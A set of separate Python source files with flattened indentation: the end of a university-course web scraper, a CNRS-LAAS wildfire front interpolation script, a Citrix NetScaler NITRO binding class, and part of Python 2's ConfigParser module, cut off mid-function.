if not any(x in split_and_strip(t)
for x in ["bachelor", "master", "phd", "doctor", "diploma"]):
return None
return t
def flush(url_courses, config):
n_flush = 0
with DataPipeline(config) as dp:
for top_url, rows in url_courses.items():
for row in rows:
n_flush += 1
row["top_url"] = top_url
dp.insert(row)
print("flushed", n_flush)
def run(config):
# Read qualifications
qual_map = {}
_results = read_all_results(config, "input_db", "input_table")
for std, abbrv in _results:
if abbrv not in qual_map:
qual_map[abbrv] = set()
qual_map[abbrv].add(std)
# Read urls which have already been done
_results = read_all_results(config, "output_db", "table_name")
already_done_urls = set(url for _, url, _, _ in _results)
print("Already found", len(already_done_urls), "previous urls")
# Read urls
_results = read_all_results(config, "input_db", "input_table_urls")
kws = ["program", "graduate", "admission", "phd", "ma", "ba", "bsc", "msc",
"dip", " doc"]
_kws = ["tel:", "news", "mailto", "/events", "calendar", "jobs.", "upload",
".pdf", ".jpg", "bulletin", "/email", "/tel/"]
urls_to_try = {}
n_skip = 0
n_todo = 0
for top_url, url, _ in _results:
if not any(kw in url.lower() for kw in kws):
continue
if any(kw in url.lower() for kw in _kws):
continue
if url in already_done_urls:
n_skip += 1
continue
if top_url not in urls_to_try:
urls_to_try[top_url] = []
n_todo += 1
urls_to_try[top_url].append(url)
print("Skipping", n_skip, ", doing", n_todo)
# Read UCAS courses
ucas_results = read_all_results(config, "input_db", "input_table_ucas")
ucas_courses = set(x[0] for x in ucas_results)
# Filter out long courses
ucas_courses = list(filter(lambda x: len(x.split()) < 6, ucas_courses))
# Check which URLs require selenium
selenium_urls = {url: wait_for for url, wait_for in
read_all_results(config, "external_db",
"input_table_selenium")}
# Only add if not already found
url_courses = {}
flush_lim = 100
iflush = 0
for top_url, urls in urls_to_try.items():
print(top_url, len(urls))
selenium = False
if top_url in selenium_urls:
print("===> Using selenium")
selenium = True
url_courses[top_url] = []
for url in set(urls):
# Generate results
n_results = 0
_results = get_sentences(url, return_url=True, selenium=selenium)
results = []
unique_texts = set()
for data in _results:
data["text"] = clean_text(data["text"], qual_map)
if data["text"] is None:
continue
if data["text"] not in unique_texts:
unique_texts.add(data["text"])
results.append(data)
for data in results:
url_courses[top_url].append(data)
n_results += 1
if n_results == 0:
data = dict(text="", go_to_url="", found_on_url=url)
url_courses[top_url].append(data)
iflush += n_results
# Flush if required
if iflush >= flush_lim:
iflush = 0
flush(url_courses, config)
for k, _ in url_courses.items():
url_courses[k] = []
# Final flush
flush(url_courses, config)
|
|
"""Test fire front interpolation"""
# Copyright (c) 2019, CNRS-LAAS
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#
#
import itertools
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm
import skimage.io
import skimage.draw
import skimage.measure
import scipy.interpolate
import fire_rs.geodata.environment as g_environment
import fire_rs.geodata.display as display
import fire_rs.rbf
from fire_rs.geodata.geo_data import GeoData
from fire_rs.firemodel.propagation import Environment, FirePropagation, TimedPoint
################################################################################
# World initialization
FIRERS_DATA_FOLDER = '/home/rbailonr/firers_data_porto'
FIRERS_DEM_DATA = os.path.join(FIRERS_DATA_FOLDER, 'dem')
FIRERS_WIND_DATA = os.path.join(FIRERS_DATA_FOLDER, 'wind')
FIRERS_LANDCOVER_DATA = os.path.join(FIRERS_DATA_FOLDER, 'landcover')
the_world = g_environment.World(elevation_path=FIRERS_DEM_DATA,
wind_path=FIRERS_WIND_DATA,
landcover_path=FIRERS_LANDCOVER_DATA, wind_mesh_resolution='fine',
landcover_to_fuel_remap=g_environment.SLOW_FUELMODEL_REMAP)
the_world.dem_wind_tile_split = 1
area = ((2776825.0 - 2500, 2776825.0 + 2500), (2212175.0 - 2500, 2212175.0 + 4500))
ignition = TimedPoint(2776825.0, 2212175.0, 0)
################################################################################
# Reference fire propagation
fire_env = Environment(area, 5., np.pi / 2, the_world)
fire_prop = FirePropagation(fire_env)
fire_prop.set_ignition_point(ignition)
propagation_end_time = 60 * 60 * 60
propagation_end_time = np.inf
fire_prop.propagate(propagation_end_time)
################################################################################
# Reference fire display
# Figure terrain + ignition contour + ignition point
gdd = display.GeoDataDisplay.pyplot_figure(
fire_env.raster.combine(fire_prop.ignitions().slice(["ignition"])), frame=(0., 0.))
gdd.draw_elevation_shade(with_colorbar=False, cmap=matplotlib.cm.terrain)
gdd.draw_wind_quiver()
gdd.draw_ignition_contour(with_labels=True, cmap=matplotlib.cm.plasma)
gdd.draw_ignition_points(ignition)
gdd.figure.show()
################################################################################
# Contour extraction
firemap = fire_prop.ignitions()
fire_image = np.ones(firemap.data.shape, dtype=np.float64) * np.NaN
firepoints = {}
# The ignition point is knwon
firepoints[fire_prop.ignitions().array_index((ignition[0], ignition[1]))] = ignition[2]
# Create contour with scikit-image
contours1 = skimage.measure.find_contours(firemap.data["ignition"], 21 * 60 * 60)
contours2 = skimage.measure.find_contours(firemap.data["ignition"], 20 * 60 * 60)
contours3 = skimage.measure.find_contours(firemap.data["ignition"], 22 * 60 * 60)
contours4 = skimage.measure.find_contours(firemap.data["ignition"], 40 * 60 * 60)
contours5 = skimage.measure.find_contours(firemap.data["ignition"], 41 * 60 * 60)
contours6 = skimage.measure.find_contours(firemap.data["ignition"], 42 * 60 * 60)
# Print contour as binary image
comp_cycle = itertools.cycle([lambda x, y: x < y, lambda x, y: x > y])
comp = next(comp_cycle)
for i in [contours1, contours2, contours3, contours4, contours5, contours6]:
comp = next(comp_cycle)
for contour in i:
for pt_i in range(len(contour)):
if comp(pt_i, len(contour) / 2):
continue
if pt_i % 1 == 0:
rr, cc = skimage.draw.line(*np.asarray(contour[pt_i - 1], dtype=int),
*np.asarray(contour[pt_i], dtype=int))
fire_image[rr, cc] = firemap.data["ignition"][rr[0], cc[0]]
for r, c in zip(rr, cc):
firepoints[r, c] = firemap.data["ignition"][r, c]
fig = plt.figure()
ax = fig.gca()
imag = ax.imshow(fire_image / 60.)
fig.colorbar(imag, ax=ax, shrink=0.65, aspect=20, format="%d minutes")
fig.show()
################################################################################
# Interpolate contour
x, y = list(zip(*firepoints.keys()))
z = tuple(firepoints.values())
function = 'thin_plate'
# function = 'linear'
# function = 'multiquadric'
# function = 'cubic'
# --function = lambda a: np.sin(a)
# Wildland fire modeling with an Eulerian level set method and automated calibration
# might give a clue of which kind of kernel function to use
zfun_smooth_rbf = fire_rs.rbf.Rbf(x, y, z, function=function, epsilon=0.1,
smooth=0) # default smooth=0 for interpolation
xi = np.linspace(0, firemap.data.shape[0] - 1, firemap.data.shape[0])
yi = np.linspace(0, firemap.data.shape[1] - 1, firemap.data.shape[1])
meshgrid = np.meshgrid(xi, yi, indexing="ij")
z_dense_smooth_rbf = zfun_smooth_rbf(
*[x.flatten() for x in meshgrid]) # not really a function, but a callable class instance
z_dense_smooth_rbf = z_dense_smooth_rbf.reshape(len(xi), len(yi))
################################################################################
# Display interpolation
fig = plt.figure()
ax = fig.gca()
levels = list(range(0, 70 * 60 * 60, 10 * 60 * 60))
ax.imshow(fire_image)
c1 = ax.contour(z_dense_smooth_rbf, levels=levels)
ax.clabel(c1)
c2 = ax.contour(firemap.data["ignition"], levels=levels, alpha=0.6)
# ax.imshow(z_dense_smooth_rbf - firemap.data["ignition"])
ax.clabel(c2)
ax.imshow(fire_image)
fig.show()
################################################################################
# Display error
fig = plt.figure()
ax = fig.gca()
levels = list(range(0, 70 * 60, 10 * 60))
diferencia = z_dense_smooth_rbf - firemap.data["ignition"]
# ax.imshow(firemap.data["ignition"])
# 150 min is 200m for wind 5km/h in wind direction
diff_image = ax.imshow(diferencia / 60., cmap=matplotlib.cm.seismic, vmin=-150, vmax=150)
cb = fig.colorbar(diff_image, ax=ax, shrink=0.65, aspect=20, format="%d minutes")
cb.set_label("Interpolation error")
ax.imshow(fire_image, cmap=matplotlib.cm.cool)
c2 = ax.contour(firemap.data["ignition"] / 60., levels=levels, cmap=matplotlib.cm.cool)
ax.clabel(c2)
# ax.imshow(fire_image)
fig.show()
################################################################################
# In 3D
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(121, projection='3d')
ax.plot_surface(*meshgrid, z_dense_smooth_rbf, color="blue")
fig.show()
ax = fig.add_subplot(122, projection='3d')
ax.plot_surface(*meshgrid, firemap.data["ignition"], color="red")
fig.show()
print("THE END")
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class policydataset_value_binding(base_resource) :
""" Binding class showing the value that can be bound to policydataset.
"""
def __init__(self) :
self._value = ""
self._index = 0
self._name = ""
self.___count = 0
@property
def value(self) :
"""Value of the specified type that is associated with the dataset.
"""
try :
return self._value
except Exception as e:
raise e
@value.setter
def value(self, value) :
"""Value of the specified type that is associated with the dataset.
"""
try :
self._value = value
except Exception as e:
raise e
@property
def name(self) :
"""Name of the dataset to which to bind the value.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name of the dataset to which to bind the value.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def index(self) :
"""The index of the value (ipv4, ipv6, number) associated with the set.
"""
try :
return self._index
except Exception as e:
raise e
@index.setter
def index(self, index) :
"""The index of the value (ipv4, ipv6, number) associated with the set.
"""
try :
self._index = index
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(policydataset_value_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.policydataset_value_binding
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = policydataset_value_binding()
updateresource.name = resource.name
updateresource.value = resource.value
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [policydataset_value_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].name = resource[i].name
updateresources[i].value = resource[i].value
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = policydataset_value_binding()
deleteresource.name = resource.name
deleteresource.value = resource.value
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [policydataset_value_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
deleteresources[i].value = resource[i].value
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name) :
""" Use this API to fetch policydataset_value_binding resources.
"""
try :
obj = policydataset_value_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
""" Use this API to fetch filtered set of policydataset_value_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = policydataset_value_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
""" Use this API to count policydataset_value_binding resources configued on NetScaler.
"""
try :
obj = policydataset_value_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
""" Use this API to count the filtered set of policydataset_value_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = policydataset_value_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class policydataset_value_binding_response(base_response) :
def __init__(self, length=1) :
self.policydataset_value_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.policydataset_value_binding = [policydataset_value_binding() for _ in range(length)]
|
|
"""Configuration file parser.
A setup file consists of sections, lead by a "[section]" header,
and followed by "name: value" entries, with continuations and such in
the style of RFC 822.
The option values can contain format strings which refer to other values in
the same section, or values in a special [DEFAULT] section.
For example:
something: %(dir)s/whatever
would resolve the "%(dir)s" to the value of dir. All reference
expansions are done late, on demand.
Intrinsic defaults can be specified by passing them into the
ConfigParser constructor as a dictionary.
class:
ConfigParser -- responsible for parsing a list of
configuration files, and managing the parsed database.
methods:
__init__(defaults=None)
create the parser and specify a dictionary of intrinsic defaults. The
keys must be strings, the values must be appropriate for %()s string
interpolation. Note that `__name__' is always an intrinsic default;
its value is the section's name.
sections()
return all the configuration section names, sans DEFAULT
has_section(section)
return whether the given section exists
has_option(section, option)
return whether the given option exists in the given section
options(section)
return list of configuration options for the named section
read(filenames)
read and parse the list of named configuration files, given by
name. A single filename is also allowed. Non-existing files
are ignored. Return list of successfully read files.
readfp(fp, filename=None)
read and parse one configuration file, given as a file object.
The filename defaults to fp.name; it is only used in error
messages (if fp has no `name' attribute, the string `<???>' is used).
get(section, option, raw=False, vars=None)
return a string value for the named option. All % interpolations are
expanded in the return values, based on the defaults passed into the
constructor and the DEFAULT section. Additional substitutions may be
provided using the `vars' argument, which must be a dictionary whose
contents override any pre-existing defaults.
getint(section, options)
like get(), but convert value to an integer
getfloat(section, options)
like get(), but convert value to a float
getboolean(section, options)
like get(), but convert value to a boolean (currently case
insensitively defined as 0, false, no, off for False, and 1, true,
yes, on for True). Returns False or True.
items(section, raw=False, vars=None)
return a list of tuples with (name, value) for each option
in the section.
remove_section(section)
remove the given file section and all its options
remove_option(section, option)
remove the given option from the given section
set(section, option, value)
set the given option
write(fp)
write the configuration state in .ini format
"""
try:
from collections import OrderedDict as _default_dict
except ImportError:
# fallback for setup.py which hasn't yet built _collections
_default_dict = dict
import re
__all__ = ["NoSectionError", "DuplicateSectionError", "NoOptionError",
"InterpolationError", "InterpolationDepthError",
"InterpolationSyntaxError", "ParsingError",
"MissingSectionHeaderError",
"ConfigParser", "SafeConfigParser", "RawConfigParser",
"DEFAULTSECT", "MAX_INTERPOLATION_DEPTH"]
DEFAULTSECT = "DEFAULT"
MAX_INTERPOLATION_DEPTH = 10
# exception classes
class Error(Exception):
"""Base class for ConfigParser exceptions."""
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation in
BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation in
BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6. To prevent
# DeprecationWarning from popping up over this pre-existing attribute, use
# a new property that takes lookup precedence.
message = property(_get_message, _set_message)
def __init__(self, msg=''):
self.message = msg
Exception.__init__(self, msg)
def __repr__(self):
return self.message
__str__ = __repr__
class NoSectionError(Error):
"""Raised when no section matches a requested option."""
def __init__(self, section):
Error.__init__(self, 'No section: %r' % (section,))
self.section = section
self.args = (section, )
class DuplicateSectionError(Error):
"""Raised when a section is multiply-created."""
def __init__(self, section):
Error.__init__(self, "Section %r already exists" % section)
self.section = section
self.args = (section, )
class NoOptionError(Error):
"""A requested option was not found."""
def __init__(self, option, section):
Error.__init__(self, "No option %r in section: %r" %
(option, section))
self.option = option
self.section = section
self.args = (option, section)
class InterpolationError(Error):
"""Base class for interpolation-related exceptions."""
def __init__(self, option, section, msg):
Error.__init__(self, msg)
self.option = option
self.section = section
self.args = (option, section, msg)
class InterpolationMissingOptionError(InterpolationError):
"""A string substitution required a setting which was not available."""
def __init__(self, option, section, rawval, reference):
msg = ("Bad value substitution:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\tkey : %s\n"
"\trawval : %s\n"
% (section, option, reference, rawval))
InterpolationError.__init__(self, option, section, msg)
self.reference = reference
self.args = (option, section, rawval, reference)
class InterpolationSyntaxError(InterpolationError):
"""Raised when the source text into which substitutions are made
does not conform to the required syntax."""
class InterpolationDepthError(InterpolationError):
"""Raised when substitutions are nested too deeply."""
def __init__(self, option, section, rawval):
msg = ("Value interpolation too deeply recursive:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\trawval : %s\n"
% (section, option, rawval))
InterpolationError.__init__(self, option, section, msg)
self.args = (option, section, rawval)
class ParsingError(Error):
"""Raised when a configuration file does not follow legal syntax."""
def __init__(self, filename):
Error.__init__(self, 'File contains parsing errors: %s' % filename)
self.filename = filename
self.errors = []
self.args = (filename, )
def append(self, lineno, line):
self.errors.append((lineno, line))
self.message += '\n\t[line %2d]: %s' % (lineno, line)
class MissingSectionHeaderError(ParsingError):
"""Raised when a key-value pair is found before any section header."""
def __init__(self, filename, lineno, line):
Error.__init__(
self,
'File contains no section headers.\nfile: %s, line: %d\n%r' %
(filename, lineno, line))
self.filename = filename
self.lineno = lineno
self.line = line
self.args = (filename, lineno, line)
class RawConfigParser:
def __init__(self, defaults=None, dict_type=_default_dict,
allow_no_value=False):
self._dict = dict_type
self._sections = self._dict()
self._defaults = self._dict()
if allow_no_value:
self._optcre = self.OPTCRE_NV
else:
self._optcre = self.OPTCRE
if defaults:
for key, value in defaults.items():
self._defaults[self.optionxform(key)] = value
def defaults(self):
return self._defaults
def sections(self):
"""Return a list of section names, excluding [DEFAULT]"""
# self._sections will never have [DEFAULT] in it
return self._sections.keys()
def add_section(self, section):
"""Create a new section in the configuration.
Raise DuplicateSectionError if a section by the specified name
already exists. Raise ValueError if name is DEFAULT or any of it's
case-insensitive variants.
"""
if section.lower() == "default":
raise ValueError, 'Invalid section name: %s' % section
if section in self._sections:
raise DuplicateSectionError(section)
self._sections[section] = self._dict()
def has_section(self, section):
"""Indicate whether the named section is present in the configuration.
The DEFAULT section is not acknowledged.
"""
return section in self._sections
def options(self, section):
"""Return a list of option names for the given section name."""
try:
opts = self._sections[section].copy()
except KeyError:
raise NoSectionError(section)
opts.update(self._defaults)
if '__name__' in opts:
del opts['__name__']
return opts.keys()
def read(self, filenames):
"""Read and parse a filename or a list of filenames.
Files that cannot be opened are silently ignored; this is
designed so that you can specify a list of potential
configuration file locations (e.g. current directory, user's
home directory, systemwide directory), and all existing
configuration files in the list will be read. A single
filename may also be given.
Return list of successfully read files.
"""
if isinstance(filenames, basestring):
filenames = [filenames]
read_ok = []
for filename in filenames:
try:
fp = open(filename)
except IOError:
continue
self._read(fp, filename)
fp.close()
read_ok.append(filename)
return read_ok
def readfp(self, fp, filename=None):
"""Like read() but the argument must be a file-like object.
The `fp' argument must have a `readline' method. Optional
second argument is the `filename', which if not given, is
taken from fp.name. If fp has no `name' attribute, `<???>' is
used.
"""
if filename is None:
try:
filename = fp.name
except AttributeError:
filename = '<???>'
self._read(fp, filename)
def get(self, section, option):
opt = self.optionxform(option)
if section not in self._sections:
if section != DEFAULTSECT:
raise NoSectionError(section)
if opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
elif opt in self._sections[section]:
return self._sections[section][opt]
elif opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
def items(self, section):
try:
d2 = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
d2 = self._dict()
d = self._defaults.copy()
d.update(d2)
if "__name__" in d:
del d["__name__"]
return d.items()
def _get(self, section, conv, option):
return conv(self.get(section, option))
def getint(self, section, option):
return self._get(section, int, option)
def getfloat(self, section, option):
return self._get(section, float, option)
_boolean_states = {'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False}
def getboolean(self, section, option):
v = self.get(section, option)
if v.lower() not in self._boolean_states:
raise ValueError, 'Not a boolean: %s' % v
return self._boolean_states[v.lower()]
def optionxform(self, optionstr):
return optionstr.lower()
def has_option(self, section, option):
"""Check for the existence of a given option in a given section."""
if not section or section == DEFAULTSECT:
option = self.optionxform(option)
return option in self._defaults
elif section not in self._sections:
return False
else:
option = self.optionxform(option)
return (option in self._sections[section]
or option in self._defaults)
def set(self, section, option, value=None):
"""Set an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
sectdict[self.optionxform(option)] = value
def write(self, fp):
"""Write an .ini-format representation of the configuration state."""
if self._defaults:
fp.write("[%s]\n" % DEFAULTSECT)
for (key, value) in self._defaults.items():
fp.write("%s = %s\n" % (key, str(value).replace('\n', '\n\t')))
fp.write("\n")
for section in self._sections:
fp.write("[%s]\n" % section)
for (key, value) in self._sections[section].items():
if key == "__name__":
continue
if (value is not None) or (self._optcre == self.OPTCRE):
key = " = ".join((key, str(value).replace('\n', '\n\t')))
fp.write("%s\n" % (key))
fp.write("\n")
def remove_option(self, section, option):
"""Remove an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
option = self.optionxform(option)
existed = option in sectdict
if existed:
del sectdict[option]
return existed
def remove_section(self, section):
"""Remove a file section."""
existed = section in self._sections
if existed:
del self._sections[section]
return existed
#
# Regular expressions for parsing section headers and options.
#
SECTCRE = re.compile(
r'\[' # [
r'(?P<header>[^]]+)' # very permissive!
r'\]' # ]
)
OPTCRE = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?P<vi>[:=])\s*' # any number of space/tab,
# followed by separator
# (either : or =), followed
# by any # space/tab
r'(?P<value>.*)$' # everything up to eol
)
OPTCRE_NV = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?:' # any number of space/tab,
r'(?P<vi>[:=])\s*' # optionally followed by
# separator (either : or
# =), followed by any #
# space/tab
r'(?P<value>.*))?$' # everything up to eol
)
def _read(self, fp, fpname):
"""Parse a sectioned setup file.
The sections in setup file contains a title line at the top,
indicated by a name in square brackets (`[]'), plus key/value
options lines, indicated by `name: value' format lines.
Continuations are represented by an embedded newline then
leading whitespace. Blank lines, lines beginning with a '#',
and just about everything else are ignored.
"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
e = None # None, or an exception
while True:
line = fp.readline()
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or line[0] in '#;':
continue
if line.split(None, 1)[0].lower() == 'rem' and line[0] in "rR":
# no leading whitespace
continue
# continuation line?
if line[0].isspace() and cursect is not None and optname:
value = line.strip()
if value:
cursect[optname].append(value)
# a section header or option header?
else:
# is it a section header?
mo = self.SECTCRE.match(line)
if mo:
sectname = mo.group('header')
if sectname in self._sections:
cursect = self._sections[sectname]
elif sectname == DEFAULTSECT:
cursect = self._defaults
else:
cursect = self._dict()
cursect['__name__'] = sectname
self._sections[sectname] = cursect
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise MissingSectionHeaderError(fpname, lineno, line)
# an option line?
else:
mo = self._optcre.match(line)
if mo:
optname, vi, optval = mo.group('option', 'vi', 'value')
optname = self.optionxform(optname.rstrip())
# This check is fine because the OPTCRE cannot
# match if it would set optval to None
if optval is not None:
if vi in ('=', ':') and ';' in optval:
# ';' is a comment delimiter only if it follows
# a spacing character
pos = optval.find(';')
if pos != -1 and optval[pos-1].isspace():
optval = optval[:pos]
optval = optval.strip()
# allow empty values
if optval == '""':
optval = ''
cursect[optname] = [optval]
else:
# valueless option handling
cursect[optname] = optval
else:
# a non-fatal parsing error occurred. set up the
# exception but keep going. the exception will be
# raised at the end of the file and will contain a
# list of all bogus lines
if not e:
e = ParsingError(fpname)
e.append(lineno, repr(line))
# if any parsing errors occurred, raise an exception
if e:
raise e
# join the multi-line values collected while reading
all_sections = [self._defaults]
all_sections.extend(self._sections.values())
for options in all_sections:
for name, val in options.items():
if isinstance(val, list):
options[name] = '\n'.join(val)
import UserDict as _UserDict
class _Chainmap(_UserDict.DictMixin):
"""Combine multiple mappings for successive lookups.
For example, to emulate Python's normal lookup sequence:
import __builtin__
pylookup = _Chainmap(locals(), globals(), vars(__builtin__))
"""
def __init__(self, *maps):
self._maps = maps
def __getitem__(self, key):
for mapping in self._maps:
try:
return mapping[key]
except KeyError:
pass
raise KeyError(key)
def keys(self):
result = []
seen = set()
for mapping in self._maps:
for key in mapping:
if key not in seen:
result.append(key)
seen.add(key)
return result
class ConfigParser(RawConfigParser):
def get(self, section, option, raw=False, vars=None):
"""Get an option value for a given section.
If `vars' is provided, it must be a dictionary. The option is looked up
in `vars' (if provided), `section', and in `defaults' in that order.
All % interpolations are expanded in the return values, unless the
optional argument `raw' is true. Values for interpolation keys are
looked up in the same manner as the option.
The section DEFAULT is special.
"""
sectiondict = {}
try:
sectiondict = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
vardict = {}
if vars:
for key, value in vars.items():
vardict[self.optionxform(key)] = value
d = _Chainmap(vardict, sectiondict, self._defaults)
option = self.optionxform(option)
try:
value = d[option]
except KeyError:
raise NoOptionError(option, section)
if raw or value is None:
return value
else:
return self._interpolate(section, option, value, d)
def items(self, section, raw=False, vars=None):
"""Return a list of tuples with (name, value) for each option
in the section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents overrides
any pre-existing defaults.
The section DEFAULT is special.
"""
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
options = d.keys()
if "__name__" in options:
options.remove("__name__")
if raw:
return [(option, d[option])
for option in options]
else:
return [(option, self._interpolate(section, option, d[option], d))
for option in options]
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
value = rawval
depth = MAX_INTERPOLATION_DEPTH
while depth: # Loop through this until it's done
depth -= 1
if value and "%(" in value:
value = self._KEYCRE.sub(self._interpolation_replace, value)
try:
value = value % vars
except KeyError, e:
raise InterpolationMissingOptionError(
option, section, rawval, e.args[0])
else:
break
if value and "%(" in value:
raise InterpolationDepthError(option, section, rawval)
return value
_KEYCRE = re.compile(r"%\(([^)]*)\)s|.")
def _interpolation_replace(self, match):
s = match.group(1)
if s is None:
return match.group()
else:
return "%%(%s)s" % self.optionxform(s)
class SafeConfigParser(ConfigParser):
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
L = []
self._interpolate_some(option, L, rawval, section, vars, 1)
return ''.join(L)
_interpvar_re = re.compile(r"%\(([^)]+)\)s")
def _interpolate_some(self, option, accum, rest, section, map, depth):
if depth > MAX_INTERPOLATION_DEPTH:
raise InterpolationDepthError(option, section, rest)
while rest:
p = rest.find("%")
if p < 0:
accum.append(rest)
return
if p > 0:
accum.append(rest[:p])
rest = rest[p:]
# p is no longer used
c = rest[1:2]
if c == "%":
accum.append("%")
rest = rest[2:]
elif c == "(":
m = self._interpvar_re.match(rest)
if m is None:
raise InterpolationSyntaxError(option, section,
"bad interpolation variable reference %r" % rest)
var = self.optionxform(m.group(1))
rest = rest[m.end():]
try:
v = map[var]
except KeyError:
raise InterpolationMissingOptionError(
option, section, rest, var)
if "%" in v:
self._interpolate_some(option, accum, v,
section, map, depth + 1)
else:
accum.append(v)
else:
raise InterpolationSyntaxError(
option, section,
"'%%' must be followed by '%%' or '(', found: %r" % (rest,))
def set(self, section, option, value=None):
"""Set an option. Extend ConfigParser.set: check for string values."""
# The only legal non-string value if we allow valueless
# options is None, so we need to check if the value is a
# string if:
# - we do not allow valueless options, or
# - we allow valueless options but the value is not None
if self._optcre is self.OPTCRE or value:
if not isinstance(value, basestring):
raise TypeError("option values must be strings")
if value is not None:
# check for bad percent signs:
